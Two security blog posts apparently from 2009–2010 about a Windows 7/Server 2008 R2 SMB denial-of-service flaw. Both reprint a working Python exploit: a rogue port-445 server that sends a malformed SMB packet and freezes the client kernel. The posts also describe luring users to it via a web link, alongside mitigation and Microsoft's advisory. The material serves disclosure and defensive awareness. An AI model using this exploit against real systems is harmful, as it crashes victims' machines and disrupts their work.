Windows 7 SMB Kernel Crash Video

Prefect — Thu, 14 Jan 2010 05:27:07 +0000

Back on November 11th, 2009 we confirmed Laurent Gaffié’s remote exploit for Windows that causes a kernel crash. The operating system actually freezes creating a denial of service when, for example, a user is tricked into clicking on a link on a web page to a malicious SMB share request. The SMB client goes into an infinite loop when processing this malformed request according to Microsoft. The video below demonstrates this effect, having a user click a web site link and showing the crash.

“We are not aware of any active attacks using the exploit code that was made public for this vulnerability”
Jerry Bryant, Microsoft

Microsoft discusses this problem under Security Advisory 977544. The Security Response Center (MSRC) blog announced last Thursday that it would not correct this bug in this month’s patch release. The MSFT advisory initially discusses ingress rules for firewalls (rules for requests coming from the Internet) under mitigating factors, which would not be helpful in the case of a user making the request by clicking a link. It then catches this though under ‘Workarounds’ by stating to “block all SMB communications to and from the Internet to help prevent attacks”, which is a correct approach.

Windows 7 SMB Crash Video

People seem to be having a hard time visualizing this attack. The video below demonstrates first the crash itself, and then simulates a user clicking a link to a malformed SMB request.

Test Code

Here is the Python code used for testing, based on Gaffie’s original post:

import SocketServer as a
packet = "\x00\x00\x00\x9a"
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class x(a.BaseRequestHandler):
  def handle(s):
      print "You connecting to me: %s"%(s.client_address[0])
      i = s.request.recv(1024)
      s.request.send(packet)
      s.request.close()
print "Waiting for the victim to connect to my open port 445"
launch = a.TCPServer(('', 445),x)
launch.serve_forever()

SMB

Server Message Block or SMB is an application-layer network protocol commonly used by Microsoft Windows to share files over the Local Area Network (LAN).

Finally

Many ISP’s will block requests associated with the SMB protocol for home broadband Internet connections in reaction to past remote threats that use the SMB port. For businesses, unless good egress rules are in place (many times they are not), this attack is a realistic threat. Good egress rules will block it, and should already be in place for other potential threats if not already there. This provides a good excuse to check.

Microsoft has yet to release a scheduled fix date for this. While not as problematic as say an exploit that allows for code injection, a remotely exploitable DOS attack that remains announced and in zero day status for more than two months likely does merit attention in February’s patch Tuesday release.

Related Posts:

Remote SMB Exploit: Crashing Windows 7 and Server 2008

Simon Price — Wed, 11 Nov 2009 21:16:28 +0000

Python code was posted today by Laurent Gaffie on his blog, demonstrating a much too easy way to remotely crash a Windows 7 or Windows Server 2008 machine. The crash is caused by sending a NetBIOS header which specifies that the SMB packet is 4 bytes smaller or larger than it actually is.

In this code sample below, you can see that the header has the length of the packet set to 9a rather than 9e (4 bytes smaller). Update: We have tested with different variations, such as 1 byte and 2 bytes off, which also caused the crash.

packet = "\x00\x00\x00\x9a" # --> length should be 9e not 9a.. 
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

We also tested this by setting 9e to aa (4 bytes larger) to see if it had the same affect and it indeed it did.

A little about the “crash”. The Operating System actually freezes. There is no error message, no blue screen of death, no indication that anything has gone wrong. Even after power cycling, the event logs show no sign of a mishap, aside from the typical events generated from booting up again.

Demonstration

Our victim targets are:

A Windows 7 Professional workstation with latest patches.
A Windows Server 2008 R2 Standard Core Edition with latest patches.

On Open BSD, Mac OSX, and Linux 2.6 workstations, we ran the python code and had it listen on port 445. I would have had a Windows server run the listening server, but SMB on Windows already listens on port 445 and for the purpose of the demonstration it was easier to run it on machines that do not listen on this port by default. From the Windows 7 and Windows Server 2008 victim machines, we simply attempt any type of SMB connection to the bad hosts listening with the Python code. This can be done by simply doing a directory command (dir) to a non-existent share (dir \\ip-address\share).

The screenshot below shows the command window with the dir command used to attempt a connection to a host (172.17.20.139) which is running the Python code, ready to send that SMB packet over. As soon as the connection is attempted, the whole machine freezes. I had resource monitor and task manager running and every counter, even the ticking of uptime, stopped dead. In some cases, I left the machine in this state for a significant amount of time. Also, the host was no longer pingable, so once the crash occurred, it was off the network and no longer attempting any more SMB traffic.

What is the big deal?

To simulate how an attacker could use this, we hosted a small internal web page, with a simple link to direct the user to our malicious host. Now, as seen in the image below, our link was very obvious for demonstration purposes, users can be redirected in various obfuscated ways. Although remote elevated privileges or sensitive data theft is not part of this proof of concept, this can still be a very troublesome issue.

References

g-laurent.blogspot.com: Windows 7 / Server 2008R2 Remote Kernel Crash
informationweek.com: Microsoft Investigating Zero-Day Windows 7 Flaw
darkreading.com: Microsoft Looks Into Bug That Can Crash Windows 7
thetechherald.com: Microsoft Kernel Smash vulnerability being investigated

Update

Microsoft says this is being investigated as a possible denial of service vulnerability, but initially responded that correcting it will be handled in the first service pack updates for Windows 7 and Server 2008 R2 rather then as a "Patch Tuesday" security update.

Microsoft has posted a security advisory (977544) regarding the issue.